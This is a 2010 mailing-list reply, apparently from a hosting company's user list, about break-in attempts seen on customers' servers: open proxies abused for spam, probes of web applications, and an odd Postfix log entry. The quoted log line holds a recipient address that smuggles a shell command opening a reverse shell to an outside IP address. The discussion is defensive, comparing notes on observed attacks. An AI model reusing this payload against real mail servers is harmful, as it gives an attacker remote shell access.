gpg: Signature made Thu Mar 18 13:49:32 2010 UTC using DSA key ID BF15490B
gpg: Good signature from "Andy Smith <andy@strugglers.net>"
gpg: aka "Andrew James Smith <andy@strugglers.net>"
gpg: aka "Andy Smith (UKUUG) <andy.smith@ukuug.org>"
gpg: aka "Andy Smith (BitFolk Ltd.) <andy@bitfolk.com>"
gpg: aka "Andy Smith (Linux User Groups UK) <andy@lug.org.uk>"
gpg: aka "Andy Smith (Cernio Technology Cooperative) <andy.smith@cernio.com>"
Hello,
On Thu, Mar 18, 2010 at 07:47:03AM +0000, Alastair Sherringham wrote:
> With all the talk about SSH security, it is also shocking to see the
> break-in attempts made on other services e.g. httpd and smtpd.
The next most common set of compromises I see amongst BitFolk's
customers are incorrect configurations of Apache and/or Squid as
wide open proxies, which are found by routine scanning and then used
to do blog comment spam.
HTTP probes for URLs of applications that have had bugs, e.g.
Wordpress, Gallery, PhpMyAdmin followed by an attempt to exploit
those bugs are regularly seen by me although I can't recall having
seen a customer's VPS been made to do anything nasty by one of these
routes. It's probably happened, though.
> an odd record in the Postfix log today was a little different :
>
> X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0 2>&0"
> Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
> 2>&0"@calliope.bitfolk
How odd. I assume it's trying to exploit some sort of sendmail bug
which must be very old, but then also uses bash's /dev/tcp support
which I thought was quite recent. Not seen one like that before!
Cheers,
Andy
--
http://bitfolk.com/ -- No-nonsense VPS hosting
